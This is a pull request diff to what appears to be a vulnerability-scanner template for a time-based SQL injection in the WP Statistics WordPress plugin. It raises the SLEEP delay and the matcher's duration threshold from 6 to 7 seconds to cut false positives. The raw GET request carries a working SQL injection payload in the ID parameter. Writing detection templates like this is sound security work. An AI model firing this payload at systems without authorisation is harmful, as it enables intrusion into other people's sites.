### PR TITLE
Update wp-statistics-sqli.yaml

### DIFF
--- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
+++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
@@ -34,13 +34,13 @@ http:
   - raw:
       - |
         @timeout: 20s
-        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
+        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(7))a) HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=6'
+          - 'duration>=7'
           - 'status_code == 500'
         condition: and
 # digest: 490a0046304402207ddca08142915363e9410129de63cd4dec2f952c6533ac90242e302b8b04002e02207cc6810c8ca39fc90e82f7419ce5a9ff8f48a48ade72f110dddae015746500d3:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
Update the time-based sql injection delay time to reduce false positives caused by network fluctuations